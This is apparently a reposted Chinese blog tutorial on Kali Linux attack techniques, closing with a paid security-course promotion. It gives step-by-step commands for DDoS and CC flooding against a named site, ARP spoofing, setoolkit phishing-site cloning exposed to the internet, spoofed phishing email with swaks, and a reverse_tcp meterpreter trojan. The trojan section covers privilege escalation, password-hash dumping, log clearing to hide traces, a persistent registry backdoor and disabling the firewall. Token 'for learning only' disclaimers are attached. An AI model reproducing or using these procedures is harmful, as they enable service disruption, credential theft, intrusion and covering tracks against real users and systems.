Kali常见攻击手段(非常详细),零基础入门到精通,看这一篇就够了

分类: 365bet有手机app吗 时间: 2025-07-19 06:34:24 作者: admin 阅读: 2376

文章目录

前言Kali常见攻击手段1 网络攻击手段1.1 DDos攻击1.2 CC攻击1.3 ARP欺骗

2 社会工程学攻击(setoolkit)2.1 搭建钓鱼网站①进入setoolkit②选择社会工程学攻击 - 网络攻击 - 钓鱼网站③站点克隆④kali获取用户名、密码⑤结合内网穿透实现公网可访问⑥公网钓鱼⑦克隆网站命令全过程

2.2 二维码2.3 钓鱼邮件2.4 远程木马2.4.1 生成木马并上传到靶机2.4.2 执行木马,操控主机2.4.3 日志清除2.4.4 创建后门2.4.5 常用命令

==零基础入门 黑客/网络安全==【----帮助网安学习,以下所有学习资料文末免费领取!----】

大纲学习教程面试刷题

资料领取

前言

Kali常见攻击手段

注意:仅用于教程和科普,切勿做违法之事,否则后果自负

1 网络攻击手段

请正确使用DDos和CC攻击,不要用来做违反当地法律法规的事情,否则后果自负

使用之前kali需要能够上网 参考:kali安装

1.1 DDos攻击

打开命令行,下载对应ddos数据包

git clone https://github.com/Andysun06/ddos

进入数据包对应的文件夹(区分大小写)

cd ddos

执行脚本 本文用于演示的kali是2020年版本,用python执行ddos-p2.py,输入命令:

python ddos-p2.py

然后会出现如下界面:

然后输入攻击对象的IP(本教程以我的网站为例)

再打开一个命令行窗口:

ping + 域名

# 得到ip

配置参数

ip: 攻击对象Attack Port即攻击端口,一般服务器默认为80(更多内容请百度)Attack Speed即攻击速度,数值越大越快,最大不能超过1000

发起攻击

按下回车,出现如下界面表示攻击成功:

1.2 CC攻击

DDoS攻击的一种类型CC (ChallengeCollapsar,挑战黑洞)攻击是DDoS攻击的一种类型,使用代理服务器向受害服务器发送大量貌似合法的请求

以root身份打开命令行输入命令

ab -n 参数1 -c 参数2 网站地址

参数一是并发数(请求的用户量) 参数二是发送总量(请求的总次数) (有兴趣的可以在百度上另外学习) 参数1,参数2和网站地址由自己设置,这里以 1000,1000,http://bjvcrrn.nat.ipyingshe.com/bbs/ 为例: 出现如下界面表示攻击成功:

DDos与CC攻击区别: 1,CC攻击(流量不大,真实IP) 通常是应用层攻击,攻击对象是网页,涉及的协议主要是HTTP,HTTPS,消耗的是服务器的CPU资源(通过请求大量调用CPU的资源,例如查询数据库) 2,DDOS攻击(流量很大,伪造IP) 通常是网络层和传输层,攻击对象是IP,涉及协议主要是IP,UDP和TCP,通常消耗的是网络带宽

1.3 ARP欺骗

首先,ARP欺骗需要用到dsniff数据包(arpspoof 是 dsniff 的一个附属工具,所以我们需要安装的是 dsniff),安装命令如下:

安装dsniff

apt-get install dsniff -y

确定网卡名称和地址

ifconfig

嗅探ip设备

嗅探你所在WLAN下所有设备的IP地址,命令如下:

fping -g 本机IP地址/24

例如我的IP是192.168.145.98,命令就是fping -g 192.168.145.98/24

我的另一台设备就出现在了这里:192.168.145.26,是一台PC(centos)

发起攻击

发起攻击之前,先查看我192.168.145.26(目标主机)的网速

结果:基本耗时在50ms左右

输入命令发起攻击:

arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址

网卡名称的查看上文已经提过,我以我的网卡为例,名称是eth0,攻击目标就是我的另一台PC,IP是192.168.145.26

因为我用的是虚拟机,并且我PC的网关配置的是192.168.145.2,因此我攻击命令如下(一般来说网关配置为xxx.xxx.xxx.1,也就是ip最后一位改为1):

arpspoof -i eth0 -t 192.168.145.26 192.168.145.2

按下回车发起攻击,出现如下页面表示攻击成功:

查看效果 现在,我的另一台PC基本上无法上网了,这就说明我们的ARP欺骗成功了。

如果你想停止攻击,就按下Ctrl+Z,攻击就停止了。

2 社会工程学攻击(setoolkit)

2.1 搭建钓鱼网站

钓鱼网站是黑客常用的用于盗取目标用户名与账号的方式,今天主要介绍setoolkit来制作钓鱼网站

setoolkit是kali下的社会工程学工具集。

①进入setoolkit

命令行输入:

setoolkit

②选择社会工程学攻击 - 网络攻击 - 钓鱼网站

社会工程学攻击

快速追踪测试

第三方模块

升级软件

升级配置

帮助123456

在上图中,我们选择1,社会工程学攻击,进入到下图页面

鱼叉式网络攻击

网页攻击

传染媒介式

建立payload和listener

邮件群发攻击

Arduino基础攻击

无线接入点攻击

二维码攻击

Powershell攻击

第三反方模块12345678910

上图中输入2,选择社会工程学中的网络攻击,进入到下图页面:

Java applet攻击

Metasploit浏览器攻击

钓鱼网站攻击

标签钓鱼攻击

网站jacking攻击

多种网站攻击

全屏幕攻击1234567

上图中选择3,进入钓鱼网站攻击,进入下图页面:

网站模板

站点克隆

用自己的网站123

如果选择网站模板的话,会有几个默认的登陆界面的模板

如果想克隆指定的页面的话,就选择2站点克隆,当然,这个功能虽然强大,但是有的网站是无法克隆的,如果无法克隆,就选择3,自己制作一样的网站去钓鱼。这里我详细讲一下站点克隆的方法。

登录页面模板:

输入2,选择google登录模板:

kali监听效果:

③站点克隆

选择完2之后,需要我们输入一些信息

上图中选择2,选择网站克隆,进入如下页面:

这个是我们克隆完之后的网站返回的ip地址,一般就写虚拟机的IP地址

# 此处我的虚拟机ip为192.168.145.98

这个是我们克隆完之后的网站返回的ip地址,一般就写虚拟机的IP地址,然后我们需要填写想要克隆的网站的url

回车之后,显示如下信息就代表克隆完成

④kali获取用户名、密码

我们将账号和密码都设为admin,点击登陆,发现有跳转到了真正的页面,也不会返回账号信息错误的界面,同时,kali也将我们输入的信息截获了,并在终端显示

⑤结合内网穿透实现公网可访问

本次使用DVWA的登录页面试验 内网穿透工具选择花生壳

到官网上下载花生壳并安装 花生壳官网

新增映射

使用https映射认证

该服务需要花费6元

配置映射

内网主机ip填写kali的ip即可

所以,这里就只需要我们将kali的IP以及端口(80)填入即可映射到外网了

但是前面也说过http协议是收费的,6块,但是能用很久个人觉得倒是不贵。

好,那现在就让我们去到最后一步!用Custom Import和花生壳去 钓 鱼 ~~

⑥公网钓鱼

注意:本文仅供学习之用,严禁做违法之事!

资料:

一、DVWA:

链接: https://pan.baidu.com/s/1URPTFthsmPU3_F54Tsyvgg?pwd=12wx 提取码: 12wx 复制这段内容后打开百度网盘手机App,操作更方便哦

--来自百度网盘超级会员v5的分享

将dvwa文件拖至/root目录下,如果拖拽有问题上文有请自行查阅

开启setoolkit

①. 打开终端输入setoolkit

②. 选择1社会工程学攻击

③. 选择2,网站攻击

④,选择3,钓鱼网站

⑤,选择3,用户导入【默认,回车即可】

⑥,选择导入的路径【/root/dvwa】

⑦,选择2,导入整个文件夹

⑧,配置内网穿透

⑨,通过域名访问,查看kali监听结果

选择3用户导入之后,会出现如下页面,如果是默认,直接回车即可 如果默认就直接回车。(如果选择域名,就需要将域名解析到该主机) 我们默认直接回车

下面我们选择2,导入整个文件夹

配置内网穿透服务

测试结果

输入网址访问:https://****.****.fun/

⑦克隆网站命令全过程

如果想要实现公网钓鱼,参照⑥即可

1. setoolkit

2. 输入1

3. 输入2

4. 输入3

5. 输入2

6. 输入kali虚拟机ip(或自己搭建的kali的ip)

7. 输入克隆的网站地址

8. 通过kali的ip访问克隆网站地址

原网站:

克隆网站:

大家也可以看到,钓鱼网站的制作其实并不难,所以我们平常在访问一些常用的有账号登陆的地方一定要看清楚url,防止被钓鱼。

2.2 二维码

SET 工具包中使用QR Code Attack模块发起二维码攻击,使被欺骗用户扫描你的二维码进入一个伪装钓鱼网站。有人肯定会认为那这个软件没啥用,但是请问正常情况下,给你一个二维码和一个未知网址,你更愿意相信哪一个?答案当然是二维码。

以下是对应命令:

1. setoolkit

2. 输入1,社会工程学攻击

3. 输入8,二维码攻击

4. 输入对应网站url(以合天为例:www.hetianlab.com)

二维码生成路径(默认):/root/.set/reports/ 结果:

然而使用手机微信扫描出来的结果如下:

需要使用手机UC浏览器扫描才可以跳转到相应网站。

以上 Kali 显得太垃圾了……推荐一个在线二维码生成平台(草料二维码生成),可生成在微信即可扫描并跳转的二维码并且种类丰富,大可为所欲为。

生成的二维码在手机微信扫描的效果如下:

【小结】以上的攻击演示告诉我们几点:

不要轻易打开一个安全性未知的网站链接或者去扫描二维码,并且傻乎乎地输入自己的账号密码等敏感信息,你看到的网站不一定是真的(现实中攻击者会绑定公网IP、公网域名来以假乱真);同时请务必留意,不要轻易连接安全性未知的WIFI,因为一旦你进入攻击者设定的WIFI,攻击者完全可以利用局域网内部的DNS欺骗攻击,使得你访问www.baidu.com这样的域名都能跳转到他指定的钓鱼网站!

2.3 钓鱼邮件

当攻击者制作了钓鱼网站、木马程序后,便会想法设法将其传给受害者,而常见的传播方式便是钓鱼网站了。安全意识较差的用户在收到钓鱼邮件后点击邮件中的钓鱼链接、下载附件中的木马程序,便可能遭受攻击!

工具简述

Swaks 是一款类似于“瑞士军刀”的工具,之所以这么说是因为它在SMTP邮件协议领域有非常非常广泛的应用,同时对于一名信息安全高级工程师来说也是一个不错的利用工具!它通常被用来伪造邮件,进行钓鱼、社工等操作。

Swaks基本用法:

1、swaks --to test@qq.com 测试邮箱的连通性;

2、参数说明(这里只是简单的罗列了一些,至于更加具体的内容可以使用–help进行查看了解):

--from test@qq.com //发件人邮箱;

--ehlo qq.com //伪造邮件ehlo头,即是发件人邮箱的域名。提供身份认证

--body "http://www.baidu.com" //引号中的内容即为邮件正文;

--header "Subject:hello" //邮件头信息,subject为邮件标题

--data ./Desktop/email.txt //将正常源邮件的内容保存成TXT文件,再作为正常邮件发送;

kali内置了swaks,查看版本swaks -v

创建一个临时邮箱,用于接收邮件 创建地址:https://www.linshi-email.com/

发起攻击

伪造一份来自 360hr 的邮件,收件人为vkshnixybj@iubridge.com,内容为:“Congratulations on your 360 interview. Please click on the link below to enter our employee information page. https://fishing.com/test.php”,如下图所示:

swaks --to vkshnixybj@iubridge.com --from hr@baidu.cn --ehlo baidu.cn --body "this is your Offer, please click on the link below to enter our employee information page. https://baidu.com"

查看临时邮箱,此时可以收到邮件消息

“===”:swaks输出的信息行

“*“:swaks中产生的错误

” ->”:发送到目标的预期行(无错误)

“<- “:服务器的预期回复(无错误)

“<**”:服务器返回的错误信息

拓展:发送邮件的时候添加上附件--attach

swaks --to qeolcz47062@chacuo.net --from hr@360.cn --ehlo 360.cn --body "this is your offer.please open the attach" --attach offer.txt

offer.txt需要在当前目录下

点开邮件:

但是,QQ邮箱和网易云邮箱暂不可送达,应该是腾讯、网易设定的安全机制的原因!在此提醒遇到可疑邮件要查看源邮件,判断发信人IP是否为可信任的IP,不然一个贸然的操作有时候将可能导致自己被钓鱼甚至攻击!

2.4 远程木马

SET 同时集成了木马生成工具,可以生成木马并调用MSF框架对远程主机进行控制。

2.4.1 生成木马并上传到靶机

1. set

2. 选择1,社会工程学攻击

3. 选择4,创建攻击载荷和监听器

4. 选择2,攻击模式选择reverse_tcp meterpreter

5. 输入ip地址(监听的主机ip,kali的ip地址)和端口(随机,只要不被占用即可)

默认生成木马地址:root/.set

将木马上传到靶机:

2.4.2 执行木马,操控主机

双击执行木马,查看结果

激活 Meterpreter 会话,获得 Shell 后即可操控 Win 7 靶机,如下图所示:

# 选择会话中的第一个目标

sessions -i 1

操纵主机

可输入help命令查看 Meterpreter 支持的所有攻击命令和描述

截图效果:

执行getsystem进行提权攻击

获取密码(windows的密码其实就是藏在一个目录下的hash值)

执行命令hashdump,尝试获取系统所有账户的密码的hash值,发现失败。没关系,可以执行Meterpreter 提供的脚本:

远程监控win7

run vnc

进一步的攻击还可以执行background将当前会话转移到后台执行,达到后台进程切换的目的。同时可以执行migrate 命令迁移会话进程到指定的进程pid,达到隐藏控制会话的进程,此时原来的进程是看不到的目的(通过ps命令可以看到受害机的哪些进程)

2.4.3 日志清除

为了不暴露攻击者的痕迹行为,需要清除系统事件

先打开 Windows 事件查看器,查看清理之前的日志记录

win + r,输入:eventvwr

在 Meterpreter 执行命令 clearev 命令,对靶机的日志进行清除,如下图所示:

但该命令存在的弊端的是,没法指定清除哪一部分的日志,一次性清除容易引起系统管理员的注意。

注意:如果不小心ctrl+Z退出了控制台,可以通过如下命令恢复

# jobs 查看当前被挂起的进程对应的号码

jobs

# 将任务调至前台继续运行

fg %jobnumber(是命令编号,不是进程号)

如果不小心退出了msf的会话,重新打开setoolkit,设置相同的ip和端口即可恢复

2.4.4 创建后门

当成功获取目标系统的访问权限后,需要寻找方法来恢复与目标主机的连接,而无需再进入目标系统。如果目标用户破坏了该连接,例如重新启动计算机,此时使用后门将允许自动重新与目标系统建立连接。为了后续渗透方便,所以需要创建一个后门,这样即使连接被中断也不会影响工作。

创建持久后门之前,先查看下它的帮助文件,如下所示:

run persistence -h

执行命令创建一个持久后门,输出的信息将显示创建后门的一个过程。Kali 将在目标系统中创建了一个持久脚本 (保存在C:\Users\thinkpad\AppData\Local\Temp\naBffRVEO.vbs)并篡改注册表,如下所示:

run persistence -X -i 5 -p 9000 -r 192.168.145.98(kali渗透机的ip)

查看 Win 7 靶机的注册表和系统文件

为了验证后门是否可利用,关闭当前攻击会话,重启 Win 7 虚拟机

此时在 Kali 虚拟机重新开启一个终端,运行 MSF 框架,监听 Win 7 虚拟机是否重启后能自动上线获得攻击会话:

至此,后门植入成功!以后只要Win 7系统开机便会自动运行后门脚本,攻击者可以随时入侵!除非受害主机的管理员发现后删除了注册表相应的键值和系统中植入的后门脚本。此时即使 Win 7 靶机中的远控木马文件 payload.exe 被管理员删除也没关系,只不过功能受限

2.4.5 常用命令

运行虚拟桌面:run vnc

获取hash值:run hashdump

查看文件夹:ls

将会话置于后台:background

查看运行时间:idletime

查看当前用户身份:getuid

查看当前用户具备的权限:getprivs

查看当前进程PID:getpid

查看目标机系统信息:sysinfo

查看正在运行的进程:ps

搜寻、拷贝、上传文件(需要拥有system权限,可以利用getsystem、MS16-032漏洞进行提权)

(1)搜寻c盘内所有以txt为后缀的文件:search -f *.txt -d c:\

(2)拷贝文件至kali内:download c:\1.txt /root

(3)上传文件至win7:upload /home/zidian/msfadmin.txt c:\

重启/关机:reboot / shutdown -h now

进入cmd:shell

获取cmd之后的常用命令:

查看当前用户:whoami

添加用户和对应密码:net user [username] [password] /add

查看当前计算机中的详细情况:systeminfo

关闭防火墙:netsh adcfirewall set allprofiles state off

查看当前计算机中网络连接通信情况:netstat -ano

msf常用命令

零基础入门 黑客/网络安全

【----帮助网安学习,以下所有学习资料文末免费领取!----】

> ① 网安学习成长路径思维导图 > ② 60+网安经典常用工具包 > ③ 100+SRC漏洞分析报告 > ④ 150+网安攻防实战技术电子书 > ⑤ 最权威CISSP 认证考试指南+题库 > ⑥ 超1800页CTF实战技巧手册 > ⑦ 最新网安大厂面试题合集(含答案) > ⑧ APP客户端安全检测指南(安卓+IOS)

大纲

首先要找一份详细的大纲。

学习教程

第一阶段:零基础入门系列教程

该阶段学完即可年薪15w+

第二阶段:技术入门

弱口令与口令爆破 XSS漏洞 CSRF漏洞 SSRF漏洞 XXE漏洞 SQL注入 任意文件操作漏洞 业务逻辑漏洞

该阶段学完年薪25w+

阶段三:高阶提升

反序列化漏洞 RCE 综合靶场实操项目 内网渗透 流量分析 日志分析 恶意代码分析 应急响应 实战训练

该阶段学完即可年薪30w+

面试刷题

最后,我其实要给部分人泼冷水,因为说实话,上面讲到的资料包获取没有任何的门槛。

但是,我觉得很多人拿到了却并不会去学习。

大部分人的问题看似是“如何行动”,其实是“无法开始”。

几乎任何一个领域都是这样,所谓“万事开头难”,绝大多数人都卡在第一步,还没开始就自己把自己淘汰出局了。

如果你真的确信自己喜欢网络安全/黑客技术,马上行动起来,比一切都重要。

资料领取

上述这份完整版的网络安全学习资料已经上传网盘,朋友们如果需要可以微信扫描下方二维码 ↓↓↓ 或者 点击以下链接都可以领取

点击领取 《网络安全&黑客&入门进阶学习资源包》

相关文章

扬子电暖器

365体育娱乐手机平台 · 06-30 阅读 7735

95668是什么银行?

365bet有手机app吗 · 07-05 阅读 3076

如何用玻璃刀切割玻璃和其他材料?

365体育娱乐手机平台 · 07-16 阅读 6728